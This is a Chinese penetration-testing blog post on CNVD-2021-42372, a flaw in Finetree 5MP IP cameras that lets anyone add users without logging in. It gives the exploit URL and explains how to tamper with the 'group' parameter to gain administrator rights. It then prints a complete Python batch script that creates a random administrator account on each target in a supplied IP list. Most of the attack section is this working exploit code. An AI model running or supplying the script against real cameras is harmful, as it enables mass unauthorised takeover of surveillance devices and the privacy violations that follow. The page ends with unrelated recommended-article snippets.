渗透测试小白
渗透测试小白

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)

文章目录

  • Finetree 5MP 摄像机任意用户添加漏洞
    • 漏洞复现
  • Finetree 5MP 未授权权限提升漏洞
    • 漏洞复现
  • 批量测试POC

EXP:http://ip:port/quicksetup/user_pop.php?method=add

Finetree 5MP 摄像机任意用户添加漏洞

漏洞复现

登录界面

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第1张图片

使用exp,访问未授权的用户添加页面,进行任意用户添加操作,添加会出现报错不用管,直接返回后台登录即可

http://ip:port/quicksetup/user_pop.php?method=add

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第2张图片

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第3张图片

Finetree 5MP 未授权权限提升漏洞

漏洞复现

使用exp添加用户并抓包,修改 ‘group=’ 参数值,放行请求包即可完成低用户提升为管理员用户

group是组,1代表guest,2是operator,3是administrator

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第4张图片

批量测试POC

#!/usr/bin/env python

# -*- conding:utf-8 -*-

# Finetree 5MP 摄像机任意用户添加


import requests

import argparse

import sys

import urllib3

import random

import threading

urllib3.disable_warnings()

  
  

def title():

    print("""

  _____  _   _ __      __ _____           ___    ___   ___   __          _  _    ___   ____   ______  ___  

 / ____|| \ | |\ \    / /|  __ \         |__ \  / _ \ |__ \ /_ |        | || |  |__ \ |___ \ |____  ||__ \

| |     |  \| | \ \  / / | |  | | ______    ) || | | |   ) | | | ______ | || |_    ) |  __) |    / /    ) |

| |     | . ` |  \ \/ /  | |  | ||______|  / / | | | |  / /  | ||______||__   _|  / /  |__ <    / /    / /

| |____ | |\  |   \  /   | |__| |         / /_ | |_| | / /_  | |           | |   / /_  ___) |  / /    / /_

 \_____||_| \_|    \/    |_____/         |____| \___/ |____| |_|           |_|  |____||____/  /_/    |____|

  

                                                                                        Author:Henry4E36

               """)

  
  

class information(object):

    def __init__(self,args):

        self.args = args

        self.url = args.url

        self.file = args.file

  

    def target_url(self):

        payload = self.url + "/quicksetup/user_update.php"

        headers = {

            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",

            "Content-Type": "application/x-www-form-urlencoded"

        }

  

        username = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",8))

        passwd = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.1234567890!@#",8))

        data = f"method=add&user={username}&pwd={passwd}&group=3&ptz_enable=0" # 1.访客 2.操作者 3.管理员

        try:

            res = requests.post(url=payload, headers=headers, data=data, verify=False, timeout=5)

            if res.status_code == 200 and "200" in res.text:

                print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在任意用户添加!\033[0m")

                print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码: {passwd} \033[0m")

                print("[" + "-"*100 + "]")

            elif res.status_code == 200 and "804" in res.text:

                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户重复!")

                print("[" + "-"*100 + "]")

            elif res.status_code == 200 and "802" in res.text:

                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户满了!")

                print("[" + "-"*100 + "]")

            else:

                print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在任意用户添加!")

                print("[" + "-"*100 + "]")

        except Exception as e:

            print("[\033[31mX\033[0m]  连接错误!")

            print("[" + "-"*100 + "]")

  
  

    def file_url(self):

        with open(self.file, "r") as urls:

            for url in urls:

                url = url.strip()

                if url[:4] != "http":

                    url = "http://" + url

                self.url = url.strip()

                information.target_url(self)

  
  

if __name__ == "__main__":

    title()

    parser = argparse.ArgumentParser(description='Finetree 5MP 摄像机任意用户添加')

    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")

    parser.add_argument("-f", "--file", metavar="file", help="Targets in file  eg:\"ip.txt\"")

    args = parser.parse_args()

    if len(sys.argv) != 3:

        print(

            "[-]  参数错误!\neg1:>>>python3 CNVD-2021-42372.py -u http://127.0.0.1 \neg2:>>>python3 CNVD-2021-42372 -f ip.txt")

    elif args.url:

        information(args).target_url()

    elif args.file:

        information(args).file_url()

你可能感兴趣的:(python,渗透测试,web安全,安全,网络安全)

  • 高效主机发现与端口枚举:fscan工具实战指南 Bruce_xiaowei 笔记总结经验网络安全fscan信息搜集
    高效主机发现与端口枚举:fscan工具实战指南在网络安全领域,主机发现与端口枚举是渗透测试和信息收集的基础环节。本文将深入探讨fscan这一高效工具的核心技术原理与实战应用,帮助你快速掌握网络扫描的核心技能。一、fscan与Nmap工具对比特性fscanNmap开发语言Python3C++主要功能主机探测、端口扫描、漏洞检测主机发现、服务识别、OS检测爆破能力内置弱口令检测需配合其他工具扫描速度极
  • Systeminternals工具集:蓝队安全分析师的瑞士军刀 Bruce_xiaowei 渗透测试笔记总结经验安全CTFwindows
    Systeminternals工具集:蓝队安全分析师的瑞士军刀引言:为何Systeminternals对安全人员至关重要在Windows安全分析和应急响应领域,Systeminternals工具集被公认为"瑞士军刀"级的存在。这套由MarkRussinovich开发(后被微软收购)的工具集提供了对Windows系统的深度访问能力,无论是分析恶意软件、排查系统异常,还是进行日常维护,都能提供无可替代
  • 2025年上半年软考系统架构设计师--案例分析试题与答案 不对法 计算机软考机考系统架构
    必选题一:大模型训练系统某公司开发一个在线大模型训练平台,支持Python代码编写、模型训练和部署,用户通过python编写模型代码,将代码交给系统进行模型代码的解析,最终由系统匹配相应的计算机资源进行输出,用户不需要关心底层硬件平台。a.系统发生错误时,不影响正常运行时发送一个消息给系统管理员(可靠性。ps:可靠性中包括了健壮性:指的是保护应用程序不受错误使用和错误输入的影响,在发生意外错误事件
  • MQTT 和 CoAP物联网通信协议之争:MQTT 与CoAP 深度对比分析 34号树洞 #MQTT专栏物联网传输层通信专栏物联网通讯协议MQTTCoAP
    目录一、核心特性对比二、关键设计目标1.MQTT2.CoAP三、优缺点分析MQTT的优缺点CoAP的优缺点四、典型应用场景对比五、技术细节对比1.消息传输流程2.安全性实现3.资源发现机制六、选择建议1.优先选择MQTT的场景2.优先选择CoAP的场景3.混合使用策略七、未来趋势总结在物联网(IoT)领域,选择合适的通信协议对于设备性能、电池寿命、网络效率和应用可靠性至关重要。MQTT(Messa
  • 【网络】SSL/TLS介绍 浅慕Antonio 网络编程网络ssl网络协议
    一、SSL/TLS概述SSL(SecureSocketLayer):最初由网景(Netscape)开发,用于在客户端和服务器之间建立安全的加密连接,防止数据被窃取或篡改。后来逐步演进,最终被TLS取代。TLS(TransportLayerSecurity):TLS是SSL的后继协议,目前已经成为互联网安全通信的标准。它不仅实现了数据加密,还提供了身份验证和数据完整性保护,确保双方通信时的信息保密且
  • 服务器、树莓派/香橙派部署HomeAssistant与小爱音箱联动 不对法 物联网物联网
    HomeAssistant功能介绍与多平台部署实战:CentOS服务器、树莓派、香橙派部署及小爱音箱联动控制一、HomeAssistant简介HomeAssistant是一款基于Python开发的开源智能家居自动化平台,它最大的特点是高度集成和自定义。通过HomeAssistant,用户可以将不同品牌、不同协议的智能家居设备(如空调、电灯、传感器等)整合到一个统一的平台进行管理和控制,同时还支持通
  • 数据分析案例-全球表面温度数据可视化与统计分析 艾派森 数据分析信息可视化python数据分析数据挖掘
    ‍♂️个人主页:@艾派森的个人主页✍作者简介:Python学习者希望大家多多支持,我们一起进步!如果文章对你有帮助的话,欢迎评论点赞收藏加关注+目录1.项目背景2.数据集介绍
  • 生信技能16 - 生信分析序列处理常用函数 生信与基因组学 生信分析项目实战技能合集pythonnumpy数据分析
    生信分析序列处理常用函数生信分析经常需要对序列进行处理,下面的实现代码可用于个人练习,可以让我们更好地理解序列处理的原理,当然python也有更高效率的包可以实现以下功能。read_seq_file读取序列txt文件函数count_nucletotides计算各核苷酸数量函数dna2rnaDNA序列转RNA序列函数seq_reverseDNA序列转换为互补序列函数count_GC_ratio计算序
  • Python 数据分析实践经验与学习心得 lzzy_sj_0999 python数据分析开发语言
    在当今数据驱动的时代,Python以其丰富的库和便捷的语法,成为数据分析领域的首选语言。本文将结合实际案例,分享Python数据分析的学习心得与实践经验,涵盖数据读取、清洗、分析及可视化等关键环节,希望能为大家的学习和工作提供帮助。一、数据分析必备库介绍在Python数据分析中,有几个核心库是必须掌握的,它们就像我们手中的“神兵利器”,能够高效完成各种数据分析任务。Pandas:用于数据处理和分析
  • 【分治算法】【Python实现】Strassen矩阵乘法 「已注销」 #分治算法分治算法Python
    文章目录@[toc]问题描述基础算法时间复杂性Strassen算法时间复杂性问题时间复杂性Python实现个人主页:丷从心·系列专栏:分治算法学习指南:算法学习指南问题描述设AAA和BBB是两个n×nn\timesnn×n矩阵,AAA和BBB的乘积矩阵CCC中元素cij=∑k=1naikbkjc_{ij}=\displaystyle\sum\limits_{k=1}^{n}{a_{ik}b_{kj
  • Docker 镜像制作 Ris Hen dockerdocker
    目录镜像制作及原因快照方式制作镜像Dockerfile制作镜像为什么需要DockerfileDockerfile指令常见问题镜像制作及原因镜像制作是因为某种需求,官方的镜像无法满足需求,需要我们通过一定手段来自定义镜像来满足要求。制作镜像往往因为以下原因1.编写的代码如何打包到镜像中直接跟随镜像发布2.第三方制作的内容安全性未知,如含有安全漏洞3.特定的需求或者功能无法满足,如需要给数据库添加审计
  • MCP如何助力智能交通系统?从数据融合到精准决策 Echo_Wish Python进阶python开发语言
    MCP如何助力智能交通系统?从数据融合到精准决策近年来,智能交通系统(ITS)正在全球范围内快速发展,它结合人工智能(AI)、物联网(IoT)和数据分析,致力于提高交通效率、减少拥堵、增强安全性。而MCP(Multi-ConstraintPathfinding,多约束路径寻优)技术作为一种复杂路径优化算法,在智能交通系统中扮演着重要角色,尤其是在导航优化、公共交通调度、应急响应等场景。今天,我们就
  • AI如何提升个性化广告精准度——让投放更智能、更懂用户 Echo_Wish 前沿技术人工智能人工智能
    AI如何提升个性化广告精准度——让投放更智能、更懂用户随着人工智能(AI)技术的发展,个性化广告已经从粗暴推送演变为智能匹配,广告主再也不想把预算砸给不感兴趣的人,而是精准触达有购买意向的用户。AI在广告投放中的核心优势在于深度数据分析、智能推荐、实时优化,让广告投放更精准、更有效。今天,我们就来聊聊AI如何提升个性化广告的精准度,并用Python代码演示其中的关键技术。1.为什么传统广告投放越来
  • N-P准则下的多传感器融合(python) 不会打架的锤子 机器学习自动化算法算法pythonvscode
    本文设计了一个主程序:main_sensor_fusion,和一个函数程序:cal_fuse。主程序里面包含主干部分和绘图部分,函数程序包含数据生成函数gen,检测概率计算函数cal,非0逻辑矩阵函数No_zero_value,单传感器判决函数fus_seq,多传感融合函数fusion。需要的点赞私聊if__name__=="__main__":begin_time=time()#Measurep
  • Python+Vue计算机毕业设计智慧养老院管理系统egn81(源码+程序+LW+部署) 心心毕设程序源码 pythonvue.js课程设计
    该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程项目运行环境配置:Python3.7.7+Django+Mysql5.7+piplist+HBuilderX(Vscode也行)+Vue+Pychram社区版。项目技术:Django+Vue+Python+Mysql等等组成,B/S模式等等。环境需要1.运行环境:最好是安装Python3.7.7,我们在这个平台上运行的。其他版本理论上也
  • InfluxDB 3 Core 持久化机制深度解析:高可靠实时数据引擎的设计哲学与工业实践 梦想画家 数据库InfluxDB分层持久化架构
    本文深入拆解InfluxDB3Core的数据持久化架构,涵盖写入流程、故障恢复、存储引擎设计,并结合物联网、金融监控等场景分析其高可靠性实现逻辑。通过对比传统时序数据库架构与性能实测数据,揭示新一代引擎如何平衡实时性与数据安全性,为大规模时序数据处理提供生产级保障。一、持久化核心机制:从写入到落盘的全链路保护1.分层持久化架构InfluxDB3Core采用三级数据保护策略:写入请求→内存缓冲区(V
  • 字节跳动Java开发面试题及参考答案(综合篇) 大模型大数据攻城狮 java后端面试大厂面试大厂校招加密算法nacos线程池
    HTTP与HTTPS的区别?HTTP(超文本传输协议)和HTTPS(超文本传输安全协议)主要有以下区别。从安全性角度看,HTTP是明文传输协议,数据在网络中传输时是以原始文本的形式发送的。这就好比在信件传递过程中没有进行密封,任何中间节点(如路由器、代理服务器等)都可以查看信件内容。例如,用户登录一个网站时发送的用户名和密码信息,如果是通过HTTP协议传输,很容易被窃取。而HTTPS是加密的安全协
  • Python在自动驾驶中的多传感器融合——让智能汽车“看得更清楚” Echo_Wish Python!实战!python自动驾驶汽车
    Python在自动驾驶中的多传感器融合——让智能汽车“看得更清楚”在自动驾驶技术的演进过程中,多传感器融合(Multi-SensorFusion)是不可或缺的一环。单一传感器往往存在局限性,例如摄像头怕光线变化,激光雷达价格昂贵,毫米波雷达分辨率有限,但如果将它们结合起来,就能形成一个更全面、更可靠的环境感知系统。今天,我们就来聊聊如何用Python实现自动驾驶中的多传感器融合,并结合最新技术趋势
  • 列表反转:reverse() 方法的深度剖析 测试者家园 测试开发和测试Python零基础学Python人工智能Python零基础学Python零基础职场和发展软件开发和测试智能化测试
    数据结构的基本操作始终是打牢编程基础的关键。而在对列表(list)这一核心数据结构的操作中,反转(reversing)是一项既常用又容易被低估的重要操作。Python提供了原地反转的reverse()方法,与返回新序列的切片[::-1]或内置函数reversed()形成了鲜明对比。本文将全面剖析list.reverse()方法,从其语义、实现机制、适用场景,到其在测试、开发与自动化中的实际运用,力
  • Python dlib(HOG+SVM)人脸识别总结 程序媛一枚~ 人脸识别python支持向量机开发语言读书笔记人脸检测识别
    Pythondlib(HOG+SVM)人脸识别总结面部标志检测dlib68点(HOG+SVM),194点人脸识别模型,包括口(外嘴唇,内嘴唇),鼻,眉毛(左右眉),眼睛(左右眼),下鄂5点面部标志检测器(左眼2点,右眼2点,鼻子1点)面部对齐更高效眨眼检测ear眨眼瞬间达到0疲劳驾驶检测—连续帧ear面部对齐眼睛连线反正切获取旋转角度,期望图像眼睛横长度计算比率左眼计算右眼相对坐标眼睛横中心点作为
  • 探索Actix-web REST API with JWT:构建高效安全的后端应用 郁蝶文Yvette
    探索Actix-webRESTAPIwithJWT:构建高效安全的后端应用actix-web-rest-api-with-jwtAsimpleCRUDbackendappusingActix-web,DieselandJWT项目地址:https://gitcode.com/gh_mirrors/ac/actix-web-rest-api-with-jwt在当今的软件开发领域,构建一个既高效又安全的
  • Python开发从新手到专家:第十四章 面向对象( OOP) 程序设计 caifox菜狐狸 Python开发从新手到专家pythonOOP面向对象继承多态静态方法
    在Python开发的旅程中,我们已经探索了诸多基础概念与实用技巧,从简单的变量赋值到复杂的函数嵌套,每一步都为构建更强大的程序奠定了坚实的基础。如今,我们即将踏入一个全新的领域——面向对象程序设计(OOP)。这一章将带你领略OOP的独特魅力,它不仅是一种编程范式,更是一种全新的思考问题和解决问题的方式。面向对象程序设计的核心在于“对象”和“类”。通过将数据和操作数据的方法封装在一起,我们可以构建出
  • 用 Python 打造立体数据世界:3D 堆叠条形图绘制全解析 Code_Verse python科研绘图
    在数据可视化的工具箱里,3D图表总能带来眼前一亮的效果——它突破了二维平面的限制,用立体空间展示多维度数据关系,让复杂的数据层级一目了然。今天我们要解锁的「3D堆叠条形图」,就是一种能同时呈现类别、子类别、数值大小的强大可视化工具,特别适合展示具有分层结构的数据。无论是商业报表中的多维度业绩分析,还是科研数据中的多指标对比,它都能让你的数据呈现瞬间高级起来~为什么选择3D堆叠条形图?先聊聊这种图表
  • 超详细【WEB应用安全测试指南--蓝队安全测试1】--超级详细的安全测试渗透性测试知识点--可直接上手进行对应的安全测试!!!!!! 生活De°咸鱼 安全专栏前端安全性测试web安全安全威胁分析
    一、概述1.1、编写目的结合公司的内部人员培养体系,本手册旨在为安全测试人员提供测试指导,安全测试人员通过查阅该指南可快速掌握Web应用安全测试,提高工作能力。1.2、使用范围本文适用于Web应用安全测试人员1.3、注意事项本文旨在为测试人员提供漏洞测试的基本思路,随着安全技术的发展,更多的新漏洞和测试方法将被爆出,安全测试人员应该具备不断学习新知识的能力。二、Web应用安全测试指南2.1、认证授
  • 网络安全防御:蓝队重保备战与应急溯源深度解析 网安认证小马135-2173-0416 web安全安全
    课程目标本课程旨在培养专业的网络安全蓝队成员,通过系统化的学习和实战演练,使学员能够掌握网络安全防御的核心技能,包括资产测绘、应急响应、系统安全应急溯源分析、网络层溯源分析以及综合攻防演练等。学员将能够熟练运用各种工具和技术,有效应对网络攻击,保障企业信息安全。具体目标如下:增强综合攻防能力:通过综合训练,学员将能够模拟攻击者和企业安全人员,开展对抗练习,提升实战能力和团队协作能力。掌握蓝队核心技
  • python爬取京东图片 通信小小白 python爬虫python爬虫图片
    网上的淘宝爬取图片的代码一般都已经不能实际运行了,在查看淘宝网源代码是找不到图片源地址,估计采取了反爬技术。又去京东看了下,发现很容易爬取。根据下面网址构建urlhttps://list.jd.com/list.html?cat=670%2C671%2C1105&go=0https://list.jd.com/list.html?cat=670,671,1105&page=2&sort=sort_
  • 数据图的类型以及如何在 Python 中创建和自定义 唐 城 唐城奇妙之旅-GISpython信息可视化数据分析
    有人说:一个人从1岁活到80岁很平凡,但如果从80岁倒着活,那么一半以上的人都可能不凡。生活没有捷径,我们踩过的坑都成为了生活的经验,这些经验越早知道࿰
  • 探索PyRDP:远程桌面协议的瑞士军刀 彭宏彬
    探索PyRDP:远程桌面协议的瑞士军刀pyrdpRDPmonster-in-the-middle(mitm)andlibraryforPythonwiththeabilitytowatchconnectionsliveorafterthefact项目地址:https://gitcode.com/gh_mirrors/py/pyrdp在网络安全领域,攻防两端的对决不断推动着工具的创新。今天,让我们聚
  • 一建市政务实-第一章-市政公用工程技术-1.城镇道路工程-2.城镇道路路基施工 泽克 安全
    2.城镇道路路基施工1.城镇道路路基施工技术1.路基施工特点与程序1.施工特点处于露天作业,受自然条件影响大,专业类型多,结构物多,各专业管线纵横交错,专业与社会之间的配合工作多,干扰多,施工变化多。交通压力、行车安全、构筑物等保护要求高;机械作业为主,人工配合为辅;专人指挥;采用流水或分段平衡作业方式。2.施工项目路基本身及有关的土(石)方、沿线的涵洞、挡土墙、路肩、边坡、各类管线3.基本流程准
  • python采集淘宝评论,API接口丨json数据示例参考 ID_18007905473 APIpython大数据jsonpython
    在Python中采集淘宝商品评论数据,通常需要通过淘宝开放平台提供的API接口来实现。然而,淘宝开放平台并没有直接提供公开的评论API接口,因此需要通过其他方式间接获取评论数据。以下是一个使用Python通过网页爬虫技术获取淘宝商品评论数据的示例。请注意,这个示例仅用于学习和研究目的,请确保遵守淘宝的使用条款和相关法律法规。示例代码importrequestsfrombs4importBeauti
  • 异常的核心类Throwable 无量 java源码异常处理exception
    java异常的核心是Throwable,其他的如Error和Exception都是继承的这个类 里面有个核心参数是detailMessage,记录异常信息,getMessage核心方法,获取这个参数的值,我们可以自己定义自己的异常类,去继承这个Exception就可以了,方法基本上,用父类的构造方法就OK,所以这么看异常是不是很easy package com.natsu;
  • mongoDB 游标(cursor) 实现分页 迭代 开窍的石头 mongodb
    上篇中我们讲了mongoDB 中的查询函数,现在我们讲mongo中如何做分页查询      如何声明一个游标        var mycursor = db.user.find({_id:{$lte:5}});       迭代显示游标数
  • MySQL数据库INNODB 表损坏修复处理过程 0624chenhong tomcatmysql
    最近mysql数据库经常死掉,用命令net stop mysql命令也无法停掉,关闭Tomcat的时候,出现Waiting for N instance(s) to be deallocated 信息。查了下,大概就是程序没有对数据库连接释放,导致Connection泄露了。因为用的是开元集成的平台,内部程序也不可能一下子给改掉的,就验证一下咯。启动Tomcat,用户登录系统,用netstat -
  • 剖析如何与设计人员沟通 不懂事的小屁孩 工作
    最近做图烦死了,不停的改图,改图……。烦,倒不是因为改,而是反反复复的改,人都会死。很多需求人员不知该如何与设计人员沟通,不明白如何使设计人员知道他所要的效果,结果只能是沟通变成了扯淡,改图变成了应付。 那应该如何与设计人员沟通呢? 我认为设计人员与需求人员先天就存在语言障碍。对一个合格的设计人员来说,整天玩的都是点、线、面、配色,哪种构图看起来协调;哪种配色看起来合理心里跟明镜似的,
  • qq空间刷评论工具 换个号韩国红果果 JavaScript
    var a=document.getElementsByClassName('textinput'); var b=[]; for(var m=0;m<a.length;m++){ if(a[m].getAttribute('placeholder')!=null) b.push(a[m]) } var l
  • S2SH整合之session 灵静志远 springAOPstrutssession
    错误信息: Caused by: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cartService': Scope 'session' is not active for the current thread; consider defining a scoped
  • xmp标签 a-john 标签
    今天在处理数据的显示上遇到一个问题: var html = '<li><div class="pl-nr"><span class="user-name">' + user + '</span>' + text + '</div></li>'; ulComme
  • Ajax的常用技巧(2)---实现Web页面中的级联菜单 aijuans Ajax
    在网络上显示数据,往往只显示数据中的一部分信息,如文章标题,产品名称等。如果浏览器要查看所有信息,只需点击相关链接即可。在web技术中,可以采用级联菜单完成上述操作。根据用户的选择,动态展开,并显示出对应选项子菜单的内容。 在传统的web实现方式中,一般是在页面初始化时动态获取到服务端数据库中对应的所有子菜单中的信息,放置到页面中对应的位置,然后再结合CSS层叠样式表动态控制对应子菜单的显示或者隐
  • 天-安-门,好高 atongyeye 情感
        我是85后,北漂一族,之前房租1100,因为租房合同到期,再续,房租就要涨150。最近网上新闻,地铁也要涨价。算了一下,涨价之后,每次坐地铁由原来2块变成6块。仅坐地铁费用,一个月就要涨200。内心苦痛。     晚上躺在床上一个人想了很久,很久。        我生在农
  • android 动画 百合不是茶 android透明度平移缩放旋转
    android的动画有两种  tween动画和Frame动画   tween动画;,透明度,缩放,旋转,平移效果   Animation   动画 AlphaAnimation 渐变透明度 RotateAnimation 画面旋转 ScaleAnimation 渐变尺寸缩放 TranslateAnimation 位置移动 Animation
  • 查看本机网络信息的cmd脚本 bijian1013 cmd
    @echo 您的用户名是:%USERDOMAIN%\%username%>"%userprofile%\网络参数.txt" @echo 您的机器名是:%COMPUTERNAME%>>"%userprofile%\网络参数.txt" @echo ___________________>>"%userprofile%\
  • plsql 清除登录过的用户 征客丶 plsql
    tools---preferences----logon history---history  把你想要删除的删除 -------------------------------------------------------------------- 若有其他凝问或文中有错误,请及时向我指出, 我好及时改正,同时也让我们一起进步。 email : binary_spac
  • 【Pig一】Pig入门 bit1129 pig
    Pig安装 1.下载pig   wget http://mirror.bit.edu.cn/apache/pig/pig-0.14.0/pig-0.14.0.tar.gz   2. 解压配置环境变量      如果Pig使用Map/Reduce模式,那么需要在环境变量中,配置HADOOP_HOME环境变量   expor
  • Java 线程同步几种方式 BlueSkator volatilesynchronizedThredLocalReenTranLockConcurrent
    为何要使用同步?      java允许多线程并发控制,当多个线程同时操作一个可共享的资源变量时(如数据的增删改查),      将会导致数据不准确,相互之间产生冲突,因此加入同步锁以避免在该线程没有完成操作之前,被其他线程的调用,      从而保证了该变量的唯一性和准确性。 1.同步方法&
  • StringUtils判断字符串是否为空的方法(转帖) BreakingBad nullStringUtils“”
    转帖地址:http://www.cnblogs.com/shangxiaofei/p/4313111.html   public static boolean isEmpty(String str)     判断某字符串是否为空,为空的标准是 str== null  或 str.length()== 0  
  • 编程之美-分层遍历二叉树 bylijinnan java数据结构算法编程之美
    import java.util.ArrayList; import java.util.LinkedList; import java.util.List; public class LevelTraverseBinaryTree { /** * 编程之美 分层遍历二叉树 * 之前已经用队列实现过二叉树的层次遍历,但这次要求输出换行,因此要
  • jquery取值和ajax提交复习记录 chengxuyuancsdn jquery取值ajax提交
    // 取值 // alert($("input[name='username']").val()); // alert($("input[name='password']").val()); // alert($("input[name='sex']:checked").val()); // alert($("
  • 推荐国产工作流引擎嵌入式公式语法解析器-IK Expression comsci java应用服务器工作Excel嵌入式
    这个开源软件包是国内的一位高手自行研制开发的,正如他所说的一样,我觉得它可以使一个工作流引擎上一个台阶。。。。。。欢迎大家使用,并提出意见和建议。。。 ----------转帖--------------------------------------------------- IK Expression是一个开源的(OpenSource),可扩展的(Extensible),基于java语言
  • 关于系统中使用多个PropertyPlaceholderConfigurer的配置及PropertyOverrideConfigurer daizj spring
    1、PropertyPlaceholderConfigurer Spring中PropertyPlaceholderConfigurer这个类,它是用来解析Java Properties属性文件值,并提供在spring配置期间替换使用属性值。接下来让我们逐渐的深入其配置。 基本的使用方法是:(1) <bean id="propertyConfigurerForWZ&q
  • 二叉树:二叉搜索树 dieslrae 二叉树
        所谓二叉树,就是一个节点最多只能有两个子节点,而二叉搜索树就是一个经典并简单的二叉树.规则是一个节点的左子节点一定比自己小,右子节点一定大于等于自己(当然也可以反过来).在树基本平衡的时候插入,搜索和删除速度都很快,时间复杂度为O(logN).但是,如果插入的是有序的数据,那效率就会变成O(N),在这个时候,树其实变成了一个链表. tree代码:
  • C语言字符串函数大全 dcj3sjt126com cfunction
    C语言字符串函数大全     函数名: stpcpy 功 能: 拷贝一个字符串到另一个 用 法: char *stpcpy(char *destin, char *source); 程序例:   #include <stdio.h> #include <string.h>   int main
  • 友盟统计页面技巧 dcj3sjt126com 技巧
    在基类调用就可以了, 基类ViewController示例代码 -(void)viewWillAppear:(BOOL)animated { [super viewWillAppear:animated]; [MobClick beginLogPageView:[NSString stringWithFormat:@"%@",self.class]];
  • window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 flyvszhb javajdk
    window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 本机已经安装了jdk1.7,而比较早期的项目需要依赖jdk1.6,于是同时在本机安装了jdk1.6和jdk1.7. 安装jdk1.6前,执行java -version得到 C:\Users\liuxiang2>java -version java version "1.7.0_21&quo
  • Java在创建子类对象的同时会不会创建父类对象 happyqing java创建子类对象父类对象
      1.在thingking in java 的第四版第六章中明确的说了,子类对象中封装了父类对象,   2."When you create an object of the derived class, it contains within it a subobject of the base class. This subobject is the sam
  • 跟我学spring3 目录贴及电子书下载 jinnianshilongnian spring
        一、《跟我学spring3》电子书下载地址: 《跟我学spring3》  (1-7 和 8-13) http://jinnianshilongnian.iteye.com/blog/pdf     跟我学spring3系列 word原版 下载     二、 源代码下载 最新依
  • 第12章 Ajax(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • BI and EIM 4.0 at a glance blueoxygen BO
    http://www.sap.com/corporate-en/press.epx?PressID=14787   有机会研究下EIM家族的两个新产品~~~~   New features of the 4.0 releases of BI and EIM solutions include: Real-time in-memory computing –
  • Java线程中yield与join方法的区别 tomcat_oracle java
    长期以来,多线程问题颇为受到面试官的青睐。虽然我个人认为我们当中很少有人能真正获得机会开发复杂的多线程应用(在过去的七年中,我得到了一个机会),但是理解多线程对增加你的信心很有用。之前,我讨论了一个wait()和sleep()方法区别的问题,这一次,我将会讨论join()和yield()方法的区别。坦白的说,实际上我并没有用过其中任何一个方法,所以,如果你感觉有不恰当的地方,请提出讨论。 &nb
  • android Manifest.xml选项 阿尔萨斯 Manifest
    结构 继承关系 public final class Manifest extends Objectjava.lang.Objectandroid.Manifest 内部类 class Manifest.permission权限 class Manifest.permission_group权限组 构造函数 public Manifest () 详细 androi
  • Oracle实现类split函数的方 zhaoshijie oracle
    关键字:Oracle实现类split函数的方 项目里需要保存结构数据,批量传到后他进行保存,为了减小数据量,子集拼装的格式,使用存储过程进行保存。保存的过程中需要对数据解析。但是oracle没有Java中split类似的函数。从网上找了一个,也补全了一下。 CREATE OR REPLACE TYPE t_split_100 IS TABLE OF VARCHAR2(100); cr
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他